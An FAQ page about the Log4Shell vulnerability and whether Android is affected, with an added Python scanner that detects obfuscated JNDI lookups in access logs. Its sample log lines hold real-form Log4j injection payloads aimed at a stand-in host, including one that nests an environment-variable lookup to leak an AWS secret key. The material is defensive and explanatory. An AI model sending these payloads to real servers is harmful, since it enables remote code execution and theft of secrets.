Q: What is the Log4j vulnerability (also known as Log4Shell)?
A: JNDI is the Java Naming and Directory Interface. It is not an app but a Java API that lets a program look up objects (database connections, configuration, remote services) by name at runtime, over protocols such as LDAP and RMI. Log4j is a common logging library used in Java server applications. Log4j 2.x (versions 2.0-beta9 through 2.14.1) performs "lookups" on the strings it logs: when a logged message contains a lookup such as ${jndi:ldap://attacker.example/x}, Log4j itself contacts the named server via JNDI, and the object it gets back can be attacker-supplied code, giving remote code execution (CVE-2021-44228). Other lookups such as ${env:...} can be folded into that request to leak environment variables and other sensitive information, and thereby facilitate other attacks. Basically this is the familiar injection / input-validation failure, except that it sits in a logging utility which, for reasons, had a useful but dangerous feature enabled by default.
Insert “XKCD Little Bobby Tables” reference here.
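To make the mechanism concrete, here is an added example (not code from the original page, and not Log4j's own implementation) that re-implements in Python a small subset of the ${...} lookup expansion a vulnerable Log4j 2.x performs on a message before writing it, and runs it as a detector over a handful of constructed access-log lines. The IP addresses and the host attacker.example are hypothetical. The point it shows beyond the answer above is that a plain grep for `${jndi:` misses payloads that abuse nested lookups (`${lower:j}`, `${::-j}`), while normalising the string the way Log4j would catches them, and that a `${env:...}` lookup nested inside the JNDI URL is how the information-leak variant works.

```python
"""Normalise Log4j 2 lookup syntax in log lines and flag JNDI lookups.

Added example (not from the original page). It re-implements, in Python, a
small subset of the ${...} lookup expansion that a vulnerable Log4j 2.x
(2.0-beta9 to 2.14.1) performs on a message before writing it, so that
obfuscated payloads such as ${${lower:j}ndi:...} are caught as well as the
plain ${jndi:...} form. Supported: nested lookups, lower/upper, and the
${name:-default} fallback; every other lookup is left as literal text.
"""
import re

# Constructed sample access-log lines (hypothetical IPs and host names).
SAMPLE_LINES = [
    '10.0.0.5 - - "GET / HTTP/1.1" 200 "-" "Mozilla/5.0"',
    '10.0.0.9 - - "GET /login HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - "GET / HTTP/1.1" 200 "-" "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.8 - - "GET / HTTP/1.1" 200 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://attacker.example/c}"',
    '10.0.0.2 - - "GET / HTTP/1.1" 200 "-" "${jndi:ldap://attacker.example/${env:AWS_SECRET_ACCESS_KEY}}"',
    '10.0.0.3 - - "GET / HTTP/1.1" 200 "-" "${date:yyyy} benign lookup, not JNDI"',
]

NAIVE_PATTERN = re.compile(r"\$\{jndi:", re.IGNORECASE)


def _resolve(body, hits):
    """Resolve one already-expanded lookup body (the text between ${ and })."""
    prefix, _, arg = body.partition(":")
    prefix = prefix.lower()
    if prefix == "jndi":
        hits.append(arg)                 # the URL Log4j would connect to
        return "${jndi:" + arg + "}"     # keep it visible in the normalised text
    if prefix == "lower":
        return arg.lower()
    if prefix == "upper":
        return arg.upper()
    if ":-" in body:                     # ${name:-default} with an unknown/empty lookup
        return body.split(":-", 1)[1]
    return "${" + body + "}"             # env:, sys:, date:, ... left as literal text


def _scan(s, i, hits, depth):
    """Walk s from index i, expanding nested ${...}; returns (text, index, closed)."""
    out = []
    while i < len(s):
        if s.startswith("${", i):
            inner, i, closed = _scan(s, i + 2, hits, depth + 1)
            out.append(_resolve(inner, hits) if closed else "${" + inner)
        elif s[i] == "}" and depth > 0:
            return "".join(out), i + 1, True
        else:
            out.append(s[i])
            i += 1
    return "".join(out), i, False


def expand_lookups(line, hits=None):
    """Return the line as Log4j would see it after lookup expansion."""
    text, _, _ = _scan(line, 0, [] if hits is None else hits, 0)
    return text


def scan_log(lines):
    """Return [(line_number, [jndi targets])] for every line carrying a JNDI lookup."""
    findings = []
    for n, line in enumerate(lines, 1):
        hits = []
        expand_lookups(line, hits)
        if hits:
            findings.append((n, hits))
    return findings


def naive_scan(lines):
    """Line numbers matched by a plain '${jndi:' grep, for comparison."""
    return [n for n, line in enumerate(lines, 1) if NAIVE_PATTERN.search(line)]


if __name__ == "__main__":
    print("naive grep hits:", naive_scan(SAMPLE_LINES))
    for n, targets in scan_log(SAMPLE_LINES):
        print(f"line {n}: JNDI lookup to {targets}")
```

Run as a script it reports that the naive grep only flags lines 2 and 5, while the normalising scanner flags lines 2, 3, 4 and 5; line 5's target still carries the `${env:AWS_SECRET_ACCESS_KEY}` text, which on a real vulnerable server Log4j would have substituted with the secret before sending the LDAP request, i.e. the leak. Real Log4j supports more lookups and escaping rules than this sketch, so treat it as a detection aid, not as a complete emulation.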
Q: Is Android OS vulnerable?
A: Not to this particular vulnerability. Although parts of Android are written in Java, the platform uses its own logging facility (android.util.Log and logcat) rather than Log4j, does not ship the JNDI API (javax.naming) as part of the Android framework, and isolates each app in its own sandbox. So this particular JNDI exploit cannot be used against the OS itself; history has shown, though, that Android is not without bugs and exploits, which is why each version tightens security further.
Q: Are Android apps vulnerable?
A: It depends. An Android app may exist only on the device, or it may be the front end of a cloud service. Android apps undoubtedly have their own bugs. On older devices any app holding the READ_LOGS permission could read the global logcat, where poorly written apps may dump usernames, passwords and other keys that are useful for debugging but have no place in a production build. As of Android 4.1 (Jelly Bean) third-party apps can only read their own log output.
The servers which the mobile apps depend upon are a different story, as noted in the media.
Q: But what about Android apps which use Log4j?
A: On device, a developer would really need to put in effort to add Log4j separately. As seen here, Log4j 2 out of the box depends on Java SE classes which Android does not provide. There is a port for Android, but it is based on Log4j 1.x, which has been end-of-life since 2015 and has unfixed problems of its own that should dissuade Android developers. Alternatively an Android developer may use slf4j for Android or another actively developed logging shim on top of the Android framework's native logging facility.
What is JNDI? What is its basic use? When is it used?